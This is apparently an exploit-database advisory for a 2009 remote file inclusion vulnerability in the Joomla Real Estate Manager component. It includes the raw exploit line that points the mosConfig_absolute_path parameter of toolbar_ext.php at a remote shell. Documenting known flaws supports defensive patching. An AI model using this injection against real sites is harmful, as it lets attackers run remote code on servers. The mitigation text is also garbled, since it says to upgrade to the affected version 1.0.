Joomla com_realestatemanager 1.0 Remote File Include

vendor:

Real Estate Manager Basic

by:

xoron

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Real Estate Manager Basic

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla com_realestatemanager 1.0 Remote File Include

A vulnerability in Joomla com_realestatemanager 1.0 allows remote attackers to include arbitrary files via a URL in the mosConfig_absolute_path parameter to toolbar_ext.php.

Mitigation:

Upgrade to the latest version of Joomla com_realestatemanager 1.0

Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_realestatemanager 1.0 Remote File Include

  Download: http://ordasoft.com/Download-document/4-Real-Estate-Manager-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

contact: xorontr@gmail.com (only e-mail)

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Thanx: str0ke, VoLkan

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2009-06-09]